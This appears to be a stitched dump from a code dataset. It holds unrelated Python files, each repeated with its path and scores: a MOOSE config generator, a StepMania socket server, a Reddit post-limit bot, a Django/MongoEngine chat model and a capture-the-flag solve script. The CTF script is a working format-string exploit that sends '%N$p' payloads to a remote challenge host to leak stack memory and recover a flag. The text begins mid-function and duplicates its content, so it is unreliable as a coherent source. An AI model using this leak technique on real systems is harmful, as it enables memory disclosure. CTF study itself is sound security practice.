section, paramsDict = getParamsOfNode(node, root) or (None, None)
if section and paramsDict:
configParams[section] = paramsDict
return configParams
def writeConfigFile(configParams: dict, configFile: str):
"""
Write the config parameters to a configuration file
Args
configParams (dictionary): a dictionary of configuration parameters {section: dict(parameter name: datatype of value)}
configFile (string): name of the configuration file to write
Return
True: if config file path exists
False: if config file path does not exist
"""
config = configparser.ConfigParser()
for key, value in configParams.items():
config[key] = value
# Write config to file
with open(configFile, 'w') as configfile:
config.write(configfile)
if os.path.exists(configFile):
return True
return False
def main():
""" Main entry point for script
Return
True: if successfully generated a configuration file
False: if invalid input file
"""
args = getParserArguments()
inputFile, isEnvVariable = getInputFilePath(args)
utils.validatePathsExist(inputFile)
if isEnvVariable:
logging.info('Template Parser started. Using input file %s', os.getenv('CONFIG_INPUT_FILE_NAME'))
configFile = getConfigFileName()
else:
configFile = getConfigFileName(inputFile)
configParams = getConfigParameters(inputFile)
isConfigFileCreated = writeConfigFile(configParams, configFile)
if isConfigFileCreated:
if isEnvVariable:
logging.info(
'Success: The Template Parser used the MOOSE input file %s to generate a configuration file %s',
os.getenv('CONFIG_INPUT_FILE_NAME'), os.getenv('CONFIG_FILE_NAME'))
else:
print('Success: The provided MOOSE input file %s generated a configuration file %s' %
(inputFile, configFile))
return True
else:
if isEnvVariable:
logging.error('Fail: Provide a valid path to a MOOSE input file (.i) to generate a configuration file')
else:
print('Fail: Provide a valid path to a MOOSE input file (.i) to generate a configuration file')
return False
if __name__ == '__main__':
main() | adapter/template_parser.py |
import os
import logging
import argparse
import configparser
import pyhit
import moosetree
import utils
def getParserArguments():
"""
Gets the arguments provided by the user via the command-line
Return
args: the arguments provided by the user and parsed by the Argument Parser
"""
# Create command-line interface
parser = argparse.ArgumentParser(prefix_chars='-',
description='Provide a MOOSE input file (.i) to generate a configuration file',
add_help=False)
options = parser.add_argument_group(title='Options')
options.add_argument('-i', metavar='<input_file>', dest='inputFile', help='Specify a MOOSE input file', nargs=1)
options.add_argument('-h', '--help', action='help', help='Displays CLI usage statement')
args, unknown = parser.parse_known_args()
# Validate the input file has ".i" extension
if args.inputFile:
utils.validateExtension(".i", args.inputFile[0])
return args
def getInputFilePath(args):
"""
Gets the path to the input file
Return
inputFile (string): the file path to the input file
isEnvVariable (bool): whether using the .env file or not (command-line)
"""
isEnvVariable = False
# Determine the input file depending on the use of the command-line interface
if args.inputFile is not None:
inputFile = args.inputFile[0]
else:
import settings
inputFile = os.getenv("CONFIG_INPUT_FILE_NAME")
isEnvVariable = True
return inputFile, isEnvVariable
def getConfigFileName(inputFile: str = None):
"""
Returns the name of the config file
Args
inputFile (string): the path to use for the config filename (command-line only)
Return
configFile (string): the file path to the config file
"""
if inputFile:
base, extension = os.path.splitext(inputFile)
configFile = '.'.join([base, 'cfg'])
else:
configFile = os.getenv("CONFIG_FILE_NAME")
return configFile
def getParamsOfNode(node: moosetree.Node, root: moosetree.Node):
"""
Determine the parameters that can be modified which have a comment with '{{config}})'
Args
node (Node): a moosetree node
root (Node): the root moosetree node
Return
section (string): the full path of the node
paramDict (dictionary): dictionary of key, value pairs of the parameter name and the datatype
"""
# Get the key, value for the parameters of this node
nodeParameters = dict(node.params())
if root:
rootParameters = dict(root.params())
paramsDict = dict()
# Determine parameters with the comment {{config}} to add to the config file
for nodeKey, nodeValue in nodeParameters.items():
comment = node.comment(param=nodeKey)
if comment is not None:
if '{{config}}' in comment:
if isinstance(nodeValue, str):
# If value is a global variable at top of input file, use the datatype of the parameter from configDict
# Purpose: type('${xmax}') = str but should be int
if '${' in nodeValue:
modifiedValue = nodeValue.replace('${', '')
modifiedValue = modifiedValue.replace('}', '')
for rootKey, rootValue in rootParameters.items():
if rootKey == modifiedValue:
paramsDict[nodeKey] = type(rootValue).__name__
else:
paramsDict[nodeKey] = type(nodeValue).__name__
else:
paramsDict[nodeKey] = type(nodeValue).__name__
# Return sections and a dictionary of parameters
if len(paramsDict) != 0:
if node.fullpath:
section = node.fullpath
else:
section = 'root'
return section, paramsDict
def getConfigParameters(inputFile: str):
"""
Determine the section and parameters for the configuration file
Args
inputFile (string): the input file for pyhit to read
Return
configParams (dictionary): a dictionary of configuration parameters {section: dict(parameter name: datatype of value)}
"""
configParams = dict()
# Read the file
root = pyhit.load(inputFile)
# Get nodes
nodes = list(moosetree.iterate(root, method=moosetree.IterMethod.PRE_ORDER))
# For root node: Determine global variables with the comment {{config}} to add to the config file
section, paramsDict = getParamsOfNode(root, None) or (None, None)
if section and paramsDict:
configParams[section] = paramsDict
# For subsection nodes: Determine parameters with the comment {{config}} to add to the config file
for node in nodes:
section, paramsDict = getParamsOfNode(node, root) or (None, None)
if section and paramsDict:
configParams[section] = paramsDict
return configParams
def writeConfigFile(configParams: dict, configFile: str):
"""
Write the config parameters to a configuration file
Args
configParams (dictionary): a dictionary of configuration parameters {section: dict(parameter name: datatype of value)}
configFile (string): name of the configuration file to write
Return
True: if config file path exists
False: if config file path does not exist
"""
config = configparser.ConfigParser()
for key, value in configParams.items():
config[key] = value
# Write config to file
with open(configFile, 'w') as configfile:
config.write(configfile)
if os.path.exists(configFile):
return True
return False
def main():
""" Main entry point for script
Return
True: if successfully generated a configuration file
False: if invalid input file
"""
args = getParserArguments()
inputFile, isEnvVariable = getInputFilePath(args)
utils.validatePathsExist(inputFile)
if isEnvVariable:
logging.info('Template Parser started. Using input file %s', os.getenv('CONFIG_INPUT_FILE_NAME'))
configFile = getConfigFileName()
else:
configFile = getConfigFileName(inputFile)
configParams = getConfigParameters(inputFile)
isConfigFileCreated = writeConfigFile(configParams, configFile)
if isConfigFileCreated:
if isEnvVariable:
logging.info(
'Success: The Template Parser used the MOOSE input file %s to generate a configuration file %s',
os.getenv('CONFIG_INPUT_FILE_NAME'), os.getenv('CONFIG_FILE_NAME'))
else:
print('Success: The provided MOOSE input file %s generated a configuration file %s' %
(inputFile, configFile))
return True
else:
if isEnvVariable:
logging.error('Fail: Provide a valid path to a MOOSE input file (.i) to generate a configuration file')
else:
print('Fail: Provide a valid path to a MOOSE input file (.i) to generate a configuration file')
return False
if __name__ == '__main__':
main() | 0.562898 | 0.149531 |
from pwn import * #Pwn Tools
import time # Sometimes the connection would time out a lot, using time.sleep reduced the timeouts.
context.log_level = 'critical' # Pwn tools config to tell us everything
lines = [] # Empty array which will contain all raw outputs
flag_chars = "" # Empty string where the entire output will be stitched into
flag_bytes = [] # Empty array where we will take 2 bits of string from flag_chars to create a byte and store them
flag_words = [] # Empty array where we will store 8 bytes at a time from flag_bytes
flag = [] # Empty array where the final flag will go
for i in range(70, 75): # A loop iterating where i is between 70 and 74
s = remote('mc.ax', 31569) # Connect to remote host
#s = process('./please') # Use this to locally test
s.recvline() # Recieve the first line the program tells us
s.sendline('please %' + str(i) + '$p') # Send in our payload, the please string, and ith %p
output = str(s.recv())[9:-15][2:] # We get the raw output and strip it saw that only the hex value remains
print(output) # Print the stripped output, just in case
lines.append(output) # Append the output in lines
s.close() # Close the connection
time.sleep(5) # Wait 5 seconds and loop or continue
lines[-1] = '000' + lines[-1] # We add 000 before the last element of outputs.
for byte in lines:
flag_chars += byte # Stitch all outputs into one big string
for x, y in zip(*[iter(flag_chars)]*2): # We iterate 2 characters at a time, x is first character and y is second, character represents bits of a byte that is
byte = str(x) + str(y) # Our byte is then x + y. So "44434241" will become "['44'], ['43'], ['42']..."
flag_bytes.append(byte) # We append the bytes to our array
if(len(flag_bytes) % 8 == 0): # After 8 bytes have been written on the flag_bytes array,
flag_words.append(flag_bytes) # We append these 8 bytes as one word in flag_words
flag_bytes = [] # And reset flag_bytes
for word in flag_words: # We take each word (8 bytes)
for byte in word[::-1]: # We reverse them
try:
flag.append(bytes.fromhex(byte).decode('ASCII')) # Convert them from hex to binary and decode in ascii and store each ASCII character in flag
except:
pass # Not all bytes are printable (such as the last ones where we added 0s, so we catch the erros and ignore them)
print("".join(flag)) # We join the characters into a flag and print it | pwn/SOLVED_printf-please/ape.py | from pwn import * #Pwn Tools
import time # Sometimes the connection would time out a lot, using time.sleep reduced the timeouts.
context.log_level = 'critical' # Pwn tools config to tell us everything
lines = [] # Empty array which will contain all raw outputs
flag_chars = "" # Empty string where the entire output will be stitched into
flag_bytes = [] # Empty array where we will take 2 bits of string from flag_chars to create a byte and store them
flag_words = [] # Empty array where we will store 8 bytes at a time from flag_bytes
flag = [] # Empty array where the final flag will go
for i in range(70, 75): # A loop iterating where i is between 70 and 74
s = remote('mc.ax', 31569) # Connect to remote host
#s = process('./please') # Use this to locally test
s.recvline() # Recieve the first line the program tells us
s.sendline('please %' + str(i) + '$p') # Send in our payload, the please string, and ith %p
output = str(s.recv())[9:-15][2:] # We get the raw output and strip it saw that only the hex value remains
print(output) # Print the stripped output, just in case
lines.append(output) # Append the output in lines
s.close() # Close the connection
time.sleep(5) # Wait 5 seconds and loop or continue
lines[-1] = '000' + lines[-1] # We add 000 before the last element of outputs.
for byte in lines:
flag_chars += byte # Stitch all outputs into one big string
for x, y in zip(*[iter(flag_chars)]*2): # We iterate 2 characters at a time, x is first character and y is second, character represents bits of a byte that is
byte = str(x) + str(y) # Our byte is then x + y. So "44434241" will become "['44'], ['43'], ['42']..."
flag_bytes.append(byte) # We append the bytes to our array
if(len(flag_bytes) % 8 == 0): # After 8 bytes have been written on the flag_bytes array,
flag_words.append(flag_bytes) # We append these 8 bytes as one word in flag_words
flag_bytes = [] # And reset flag_bytes
for word in flag_words: # We take each word (8 bytes)
for byte in word[::-1]: # We reverse them
try:
flag.append(bytes.fromhex(byte).decode('ASCII')) # Convert them from hex to binary and decode in ascii and store each ASCII character in flag
except:
pass # Not all bytes are printable (such as the last ones where we added 0s, so we catch the erros and ignore them)
print("".join(flag)) # We join the characters into a flag and print it | 0.167729 | 0.521167 |
import socket
from threading import Thread
from smserver.smutils import smconn
class SocketConn(smconn.StepmaniaConn, Thread):
ENCODING = "binary"
def __init__(self, serv, ip, port, conn):
Thread.__init__(self)
smconn.StepmaniaConn.__init__(self, serv, ip, port)
self._conn = conn
def received_data(self):
full_data = b""
size = None
data_left = b""
while True:
if len(data_left) > 0:
data = data_left
data_left = b""
else:
try:
data = self._conn.recv(8192)
except socket.error:
yield None
continue
if data == b'':
yield None
continue
if not size:
if len(data) < 5:
self.log.info("packet %s drop: to short", data)
continue
full_data = data[:4]
data = data[4:]
size = int.from_bytes(full_data[:4], byteorder='big')
if len(data) < size - len(full_data):
full_data += data
continue
payload_size = len(full_data) - 4 + size
full_data += data[:payload_size]
yield full_data
data_left = data[payload_size:]
full_data = b""
size = None
def send_data(self, data):
with self.mutex:
try:
self._conn.sendall(data)
except OSError:
self.close()
def close(self):
self._conn.close()
smconn.StepmaniaConn.close(self)
class SocketServer(smconn.SMThread):
def __init__(self, server, ip, port):
smconn.SMThread.__init__(self, server, ip, port)
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._socket.bind((self.ip, self.port))
self._socket.listen(5)
self._continue = True
self._connections = []
def run(self):
while self._continue:
try:
conn, addr = self._socket.accept()
except socket.error:
self._socket.close()
break
ip, port = addr
thread = SocketConn(self.server, ip, port, conn)
self.server.add_connection(thread)
thread.start()
smconn.SMThread.run(self)
def stop(self):
smconn.SMThread.stop(self)
self._continue = False
self._socket.shutdown(socket.SHUT_RDWR) | smserver/smutils/smconnections/smtcpsocket.py |
import socket
from threading import Thread
from smserver.smutils import smconn
class SocketConn(smconn.StepmaniaConn, Thread):
ENCODING = "binary"
def __init__(self, serv, ip, port, conn):
Thread.__init__(self)
smconn.StepmaniaConn.__init__(self, serv, ip, port)
self._conn = conn
def received_data(self):
full_data = b""
size = None
data_left = b""
while True:
if len(data_left) > 0:
data = data_left
data_left = b""
else:
try:
data = self._conn.recv(8192)
except socket.error:
yield None
continue
if data == b'':
yield None
continue
if not size:
if len(data) < 5:
self.log.info("packet %s drop: to short", data)
continue
full_data = data[:4]
data = data[4:]
size = int.from_bytes(full_data[:4], byteorder='big')
if len(data) < size - len(full_data):
full_data += data
continue
payload_size = len(full_data) - 4 + size
full_data += data[:payload_size]
yield full_data
data_left = data[payload_size:]
full_data = b""
size = None
def send_data(self, data):
with self.mutex:
try:
self._conn.sendall(data)
except OSError:
self.close()
def close(self):
self._conn.close()
smconn.StepmaniaConn.close(self)
class SocketServer(smconn.SMThread):
def __init__(self, server, ip, port):
smconn.SMThread.__init__(self, server, ip, port)
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._socket.bind((self.ip, self.port))
self._socket.listen(5)
self._continue = True
self._connections = []
def run(self):
while self._continue:
try:
conn, addr = self._socket.accept()
except socket.error:
self._socket.close()
break
ip, port = addr
thread = SocketConn(self.server, ip, port, conn)
self.server.add_connection(thread)
thread.start()
smconn.SMThread.run(self)
def stop(self):
smconn.SMThread.stop(self)
self._continue = False
self._socket.shutdown(socket.SHUT_RDWR) | 0.322419 | 0.168515 |
import sys
import time
import logging
import praw
import prawcore
from pprint import pprint
submission_pool = []
# Set to True to test, posts won't be removed
POST_TEST_MODE = False
# Set to a discord webhook for announcements
DISCORD_WEBHOOK_URL = None
def main():
# SET THESE - reddit application configuration
user_agent = ''
client_id = ''
client_secret = ''
username = ''
password = ''
# SET THESE - Customize these for your subreddit.
subreddit_name = ''
post_limit_count = 4
post_limit_hours = 24
logging.basicConfig(
format='%(asctime)s %(levelname)s %(message)s',
level=logging.INFO
)
reddit = praw.Reddit(user_agent=user_agent,
client_id=client_id,
client_secret=client_secret,
username=username,
password=password)
logging.info('Watching subreddit: %s', subreddit_name)
logging.info('Current limit set to %d posts in %d hours',
post_limit_count, post_limit_hours)
subreddit = reddit.subreddit(subreddit_name)
check_subreddit(subreddit, post_limit_count, post_limit_hours)
def filter_submissions(submissions, start_time, end_time = None, username = None):
"""Return all submissions created after the start_time.
Optional: Also before end_time if given.
Optional: Also by username if given."""
filtered = []
for s in submissions:
if end_time and s.created_utc >= end_time:
continue
elif username and username != s.author.name:
continue
elif s.created_utc > start_time:
filtered.append(s)
return filtered
def check_subreddit(subreddit, post_limit_count, post_limit_hours):
global submission_pool
max_new_submissions = 100
loop_delay = 119 # seconds
# Initial search range will start 10m ago.
#search_time = time.time() - (60*60*6)
# The loop
running = True
dotter = Dotter(120)
while running:
while True:
submission_pool = []
try:
submissions = subreddit.new(limit=max_new_submissions)
except praw.exceptions.APIException as e:
logging.error('API Exception!')
pprint(vars(e))
logging.info('Retrying in 60 seconds.')
time.sleep(60)
except praw.exceptions.ClientException as e:
logging.error('Client Exception!')
pprint(vars(e))
logging.info('Retrying in 60 seconds.')
time.sleep(60)
except prawcore.exceptions.OAuthException as e:
logging.critical('Login failed.')
sys.exit(1)
except Exception as e:
pprint(vars(e))
time.sleep(120)
else:
for s in submissions:
submission_pool.append(s)
if search_time:
new_submissions = filter_submissions(submission_pool, search_time)
else:
new_submissions = [ submission_pool[0] ]
search_time = submission_pool[0].created_utc
# These start newest first. We want oldest first
new_submissions.reverse()
break
if len(new_submissions) > 0:
dotter.reset()
stamp = time.strftime("%Y-%m-%d %H:%M:%S %Z",
time.localtime(search_time))
logging.info("- New submission count is %d since %s", len(new_submissions),
stamp)
for submission in new_submissions:
# Announce to discord
send_discord_webhook(submission)
stamp = time.strftime("%Y-%m-%d %H:%M:%S %Z",
time.localtime(submission.created_utc))
link = 'https://redd.it/' + submission.id
logging.info('-- New post: %s, "%s" by "%s", %s', stamp,
submission.title, submission.author.name, link)
try:
check_post_limits(submission, post_limit_hours,
post_limit_count)
except praw.exceptions.APIException as e:
logging.error('API Exception!')
pprint(vars(e))
break
else:
search_time = submission.created_utc
else:
#search_time = time.time()
dotter.dot()
try:
time.sleep(loop_delay)
except KeyboardInterrupt:
print ('..exiting')
sys.exit(0)
def check_post_limits(orig_submission, limit_hours, limit_posts):
buffer_seconds = 600
start_time = (orig_submission.created_utc
- (limit_hours * 60 * 60)
+ buffer_seconds)
username = orig_submission.author.name
subreddit = orig_submission.subreddit
search_submissions = filter_submissions(submission_pool, start_time,
orig_submission.created_utc, username)
count = len(search_submissions)
for i, s in enumerate(search_submissions, 1):
stamp = time.strftime("%Y-%m-%d %H:%M:%S %Z",
time.localtime(s.created_utc))
link = 'https://redd.it/' + s.id
logging.info('Post history (%d/%d): %s, "%s", %s', i, count, stamp,
s.title, link)
# Include the excluded post
count += 1
logging.info('%d hour post count: %d', limit_hours, count)
if count > limit_posts and POST_TEST_MODE:
logging.info('Test mode is ON. Post not removed.')
elif count > limit_posts and not POST_TEST_MODE:
try:
orig_submission.mod.remove()
except Exception as e:
# If the login user isn't permitted to remove posts, don't stop
if e.response.status_code == 403:
logging.error('The current username does not have permission '
'to remove submissions! Verify the login '
'is correct and has subreddit mod access.')
else:
raise e
else:
name = "u/" + orig_submission.author.name
logging.info('"%s" removed.', orig_submission.title)
msg_link = "/message/compose/?to=/" + subreddit._path
reply_text = (
"Hi " + name + ",\n\n"
"Your submission was automatically removed because you have "
"exceeded **{}** submissions within the last **{}** hours.\n\n"
"*I am a bot, and this action was performed automatically. "
"Please [contact the moderators of this subreddit]"
"(" + msg_link + ") if you have questions or "
"concerns.*").format(limit_posts, limit_hours)
notification = orig_submission.reply(reply_text)
notification.mod.distinguish('yes')
def send_discord_webhook(submission):
if not DISCORD_WEBHOOK_URL:
return
import json
import requests
stamp = time.strftime("%Y-%m-%dT%H:%M:%SZ",
time.gmtime(submission.created_utc))
author = '[{}](https://www.reddit.com/u/{})'.format(submission.author.name,
submission.author.name)
data = {'embeds':
[{
'title': submission.title,
'url': 'https://www.reddit.com'+submission.permalink,
'timestamp': stamp,
'fields': [
{
'name': 'Author',
'value': author,
'inline': 'true'
},
{
'name': 'Image URL',
'value': submission.url,
'inline': 'true'
}
],
'image': {
'url': submission.url
}
}]
}
while True:
response = requests.post(
DISCORD_WEBHOOK_URL, data=json.dumps(data),
headers = {'Content-Type': 'application/json'}
)
if response.status_code != 204:
logging.error('Request to discord returned error %s, response is: %s'
% (response.status_code, response.text))
time.sleep(10)
continue
break
class Dotter:
"""Show time passing with easy to read symbols."""
def __init__(self, seconds = 120):
self.count = 0
self.seconds_per_dot = seconds
def reset(self):
if self.count > 0:
self.count = 0
print('')
def dot(self):
self.count = self.count + 1
minutes = self.count * self.seconds_per_dot / 60
if minutes % 60 == 0:
sys.stdout.write('^')
elif minutes % 30 == 0:
sys.stdout.write('!')
elif minutes % 15 == 0:
sys.stdout.write('+')
elif minutes % 10 == 0:
sys.stdout.write(':')
else:
sys.stdout.write('.')
sys.stdout.flush()
if __name__ == '__main__':
main() | enforce_posting_limits.py | import sys
import time
import logging
import praw
import prawcore
from pprint import pprint
submission_pool = []
# Set to True to test, posts won't be removed
POST_TEST_MODE = False
# Set to a discord webhook for announcements
DISCORD_WEBHOOK_URL = None
def main():
# SET THESE - reddit application configuration
user_agent = ''
client_id = ''
client_secret = ''
username = ''
password = ''
# SET THESE - Customize these for your subreddit.
subreddit_name = ''
post_limit_count = 4
post_limit_hours = 24
logging.basicConfig(
format='%(asctime)s %(levelname)s %(message)s',
level=logging.INFO
)
reddit = praw.Reddit(user_agent=user_agent,
client_id=client_id,
client_secret=client_secret,
username=username,
password=password)
logging.info('Watching subreddit: %s', subreddit_name)
logging.info('Current limit set to %d posts in %d hours',
post_limit_count, post_limit_hours)
subreddit = reddit.subreddit(subreddit_name)
check_subreddit(subreddit, post_limit_count, post_limit_hours)
def filter_submissions(submissions, start_time, end_time = None, username = None):
"""Return all submissions created after the start_time.
Optional: Also before end_time if given.
Optional: Also by username if given."""
filtered = []
for s in submissions:
if end_time and s.created_utc >= end_time:
continue
elif username and username != s.author.name:
continue
elif s.created_utc > start_time:
filtered.append(s)
return filtered
def check_subreddit(subreddit, post_limit_count, post_limit_hours):
global submission_pool
max_new_submissions = 100
loop_delay = 119 # seconds
# Initial search range will start 10m ago.
#search_time = time.time() - (60*60*6)
# The loop
running = True
dotter = Dotter(120)
while running:
while True:
submission_pool = []
try:
submissions = subreddit.new(limit=max_new_submissions)
except praw.exceptions.APIException as e:
logging.error('API Exception!')
pprint(vars(e))
logging.info('Retrying in 60 seconds.')
time.sleep(60)
except praw.exceptions.ClientException as e:
logging.error('Client Exception!')
pprint(vars(e))
logging.info('Retrying in 60 seconds.')
time.sleep(60)
except prawcore.exceptions.OAuthException as e:
logging.critical('Login failed.')
sys.exit(1)
except Exception as e:
pprint(vars(e))
time.sleep(120)
else:
for s in submissions:
submission_pool.append(s)
if search_time:
new_submissions = filter_submissions(submission_pool, search_time)
else:
new_submissions = [ submission_pool[0] ]
search_time = submission_pool[0].created_utc
# These start newest first. We want oldest first
new_submissions.reverse()
break
if len(new_submissions) > 0:
dotter.reset()
stamp = time.strftime("%Y-%m-%d %H:%M:%S %Z",
time.localtime(search_time))
logging.info("- New submission count is %d since %s", len(new_submissions),
stamp)
for submission in new_submissions:
# Announce to discord
send_discord_webhook(submission)
stamp = time.strftime("%Y-%m-%d %H:%M:%S %Z",
time.localtime(submission.created_utc))
link = 'https://redd.it/' + submission.id
logging.info('-- New post: %s, "%s" by "%s", %s', stamp,
submission.title, submission.author.name, link)
try:
check_post_limits(submission, post_limit_hours,
post_limit_count)
except praw.exceptions.APIException as e:
logging.error('API Exception!')
pprint(vars(e))
break
else:
search_time = submission.created_utc
else:
#search_time = time.time()
dotter.dot()
try:
time.sleep(loop_delay)
except KeyboardInterrupt:
print ('..exiting')
sys.exit(0)
def check_post_limits(orig_submission, limit_hours, limit_posts):
buffer_seconds = 600
start_time = (orig_submission.created_utc
- (limit_hours * 60 * 60)
+ buffer_seconds)
username = orig_submission.author.name
subreddit = orig_submission.subreddit
search_submissions = filter_submissions(submission_pool, start_time,
orig_submission.created_utc, username)
count = len(search_submissions)
for i, s in enumerate(search_submissions, 1):
stamp = time.strftime("%Y-%m-%d %H:%M:%S %Z",
time.localtime(s.created_utc))
link = 'https://redd.it/' + s.id
logging.info('Post history (%d/%d): %s, "%s", %s', i, count, stamp,
s.title, link)
# Include the excluded post
count += 1
logging.info('%d hour post count: %d', limit_hours, count)
if count > limit_posts and POST_TEST_MODE:
logging.info('Test mode is ON. Post not removed.')
elif count > limit_posts and not POST_TEST_MODE:
try:
orig_submission.mod.remove()
except Exception as e:
# If the login user isn't permitted to remove posts, don't stop
if e.response.status_code == 403:
logging.error('The current username does not have permission '
'to remove submissions! Verify the login '
'is correct and has subreddit mod access.')
else:
raise e
else:
name = "u/" + orig_submission.author.name
logging.info('"%s" removed.', orig_submission.title)
msg_link = "/message/compose/?to=/" + subreddit._path
reply_text = (
"Hi " + name + ",\n\n"
"Your submission was automatically removed because you have "
"exceeded **{}** submissions within the last **{}** hours.\n\n"
"*I am a bot, and this action was performed automatically. "
"Please [contact the moderators of this subreddit]"
"(" + msg_link + ") if you have questions or "
"concerns.*").format(limit_posts, limit_hours)
notification = orig_submission.reply(reply_text)
notification.mod.distinguish('yes')
def send_discord_webhook(submission):
if not DISCORD_WEBHOOK_URL:
return
import json
import requests
stamp = time.strftime("%Y-%m-%dT%H:%M:%SZ",
time.gmtime(submission.created_utc))
author = '[{}](https://www.reddit.com/u/{})'.format(submission.author.name,
submission.author.name)
data = {'embeds':
[{
'title': submission.title,
'url': 'https://www.reddit.com'+submission.permalink,
'timestamp': stamp,
'fields': [
{
'name': 'Author',
'value': author,
'inline': 'true'
},
{
'name': 'Image URL',
'value': submission.url,
'inline': 'true'
}
],
'image': {
'url': submission.url
}
}]
}
while True:
response = requests.post(
DISCORD_WEBHOOK_URL, data=json.dumps(data),
headers = {'Content-Type': 'application/json'}
)
if response.status_code != 204:
logging.error('Request to discord returned error %s, response is: %s'
% (response.status_code, response.text))
time.sleep(10)
continue
break
class Dotter:
"""Show time passing with easy to read symbols."""
def __init__(self, seconds = 120):
self.count = 0
self.seconds_per_dot = seconds
def reset(self):
if self.count > 0:
self.count = 0
print('')
def dot(self):
self.count = self.count + 1
minutes = self.count * self.seconds_per_dot / 60
if minutes % 60 == 0:
sys.stdout.write('^')
elif minutes % 30 == 0:
sys.stdout.write('!')
elif minutes % 15 == 0:
sys.stdout.write('+')
elif minutes % 10 == 0:
sys.stdout.write(':')
else:
sys.stdout.write('.')
sys.stdout.flush()
if __name__ == '__main__':
main() | 0.319334 | 0.080177 |
from django.db import models
import logging
import datetime
from wi_model_util.imodel import *
from mongoengine import *
from base.settings import CHATPAMONGO
from app.util.messageque.msgsender import MessageSender
from app.customer.models.user import User
from app.util.shumeitools.shumeitools import *

# Open the module-level MongoDB connection used by the documents below.
# The original line held a redaction placeholder (`<PASSWORD>`), which is not
# valid Python; read the credential from settings like the other connection
# fields. Assumes CHATPAMONGO exposes a `.password` attribute -- TODO confirm.
connect(CHATPAMONGO.db, host=CHATPAMONGO.host, port=CHATPAMONGO.port, username=CHATPAMONGO.username,
        password=CHATPAMONGO.password)
class ChatMessage(Document):
    """One chat message between two users.

    Text messages (type 1) go through the shumei anti-spam check before being
    persisted; image messages (type 2) are queued for asynchronous moderation.
    """
    from_user_id = IntField(verbose_name=u"用户id")
    to_user_id = IntField(verbose_name=u"接收用户id")
    # Pass the callable, not its result: `default=datetime.datetime.now()`
    # froze the module-import timestamp into every new document.
    create_time = DateTimeField(verbose_name=u"创建时间", default=datetime.datetime.now)
    type = IntField(verbose_name=u"消息类型")  # 1: text  2: image  3: audio
    content = StringField(max_length=1024, verbose_name=u"消息内容")
    conversation_id = StringField(verbose_name=u"会话id", max_length=64)
    resource_url = StringField(verbose_name=u"图片,音频 资源地址", max_length=512)
    show_status = IntField(verbose_name=u"图片,音频 鉴定状态")  # 1: visible  2: blocked  3: pending review

    @classmethod
    def create_chat_message(cls, from_user_id, to_user_id, type, content, conversation_id, resource_url, user_ip):
        """Persist a message and advance the conversation state machine.

        Returns ``(status, create_time, conversation_id, message)``; status 2
        means the text was rejected by moderation, status 1 means the
        conversation has just become established.
        """
        obj_ = cls()
        obj_.from_user_id = from_user_id
        obj_.to_user_id = to_user_id
        obj_.type = type
        obj_.content = content
        obj_.create_time = datetime.datetime.now()
        obj_.conversation_id = conversation_id
        obj_.resource_url = resource_url
        # Images start hidden (pending review); everything else shows at once.
        if int(type) == 2:
            obj_.show_status = 3
        else:
            obj_.show_status = 1
        if int(type) == 1:
            # Synchronous text-content moderation.
            user = User.objects.filter(id=from_user_id).first()
            ret, duration = shumei_text_spam(text=content, timeout=1, user_id=from_user_id, channel="MESSAGE", nickname=user.nickname,
                                             phone=user.phone, ip=user_ip)
            is_pass = 0
            if ret["code"] == 1100:
                if ret["riskLevel"] == "PASS":
                    is_pass = 1
                    obj_.show_status = 1
                if ret["riskLevel"] == "REJECT":
                    is_pass = 0
                    obj_.show_status = 2
                if ret["riskLevel"] == "REVIEW":
                    # TODO: route to a manual-review flow; treated as pass for now.
                    is_pass = 1
                    obj_.show_status = 1
            obj_.save()
            if not is_pass:
                message = u"经系统检测,您的内容涉及违规因素,请重新编辑"
                return 2, None, None, message
        else:
            # Bug fix: non-text messages were never saved here, so `obj_.id`
            # below was None when queued for image moderation. TODO confirm
            # there is no other save path for these documents.
            obj_.save()
        # Advance conversation state.
        status = 0
        create_time = None
        conversation = UserConversation.objects.filter(id=conversation_id).first()
        con_type = conversation.type
        now = datetime.datetime.now()
        if con_type == 3:
            # Prop stage -> waiting for a reply.
            conversation.update(set__type=2)
            conversation.update(set__wait_time=now)
        if con_type == 2:
            # If the peer has already replied in this conversation, mark it established.
            message = ChatMessage.objects.filter(conversation_id=conversation_id, from_user_id=to_user_id, to_user_id=from_user_id).first()
            if message:
                conversation.update(set__type=1)
                conversation.update(set__start_time=now)
                status = 1
                create_time = now
        if int(type) == 2:
            # Queue the image for asynchronous moderation.
            MessageSender.send_picture_detect(pic_url=resource_url, user_id=0, pic_channel=0, source=4, obj_id=str(obj_.id))
        return status, create_time, conversation_id, ""
class UserConversation(Document):
    """State of a conversation initiated by `from_user_id` toward `to_user_id`."""
    from_user_id = IntField(verbose_name=u"用户id")
    to_user_id = IntField(verbose_name=u"接收用户id")
    send_id = IntField(verbose_name=u"道具使用 用户id")
    # Callable default: evaluated per document instead of once at import time.
    create_time = DateTimeField(verbose_name=u"创建时间", default=datetime.datetime.now)
    type = IntField(verbose_name=u"会话状态")  # 1: established  2: not established  3: prop stage  4: closed
    start_time = DateTimeField(verbose_name=u"会话开始时间")
    stop_time = DateTimeField(verbose_name=u"会话关闭时间")
    wait_time = DateTimeField(verbose_name=u"等待开始时间")
    is_send_tool = IntField(verbose_name=u"是否使用道具")  # 1: used  2: not used
    tool_time_type = IntField(verbose_name=u"道具消耗的类型")  # 0: time-limited  1: permanent
    stop_type = IntField(verbose_name=u"是否使用道具")  # 1: closed on timeout  2: cancelled

    @classmethod
    def create_conversation_message(cls, from_user_id, to_user_id, type, is_send_tool):
        """Create, persist and return a new conversation document."""
        obj_ = cls()
        obj_.from_user_id = from_user_id
        obj_.to_user_id = to_user_id
        obj_.type = type
        obj_.is_send_tool = is_send_tool
        obj_.create_time = datetime.datetime.now()
        obj_.save()
        return obj_

    @classmethod
    def cancel(cls, conversation_id, from_user_id, to_user_id):
        """Close both directions of the conversation, marking them cancelled."""
        conversation = cls.objects.filter(id=conversation_id, from_user_id=from_user_id, to_user_id=to_user_id).first()
        rever_conversation = cls.objects.filter(id=conversation_id, from_user_id=to_user_id, to_user_id=from_user_id).first()
        # One timestamp for both directions keeps the pair consistent.
        now = datetime.datetime.now()
        for conv in (conversation, rever_conversation):
            if conv:
                conv.update(set__type=4)
                conv.update(set__stop_time=now)
                conv.update(set__stop_type=2)
from django.db import models
import logging
import datetime
from wi_model_util.imodel import *
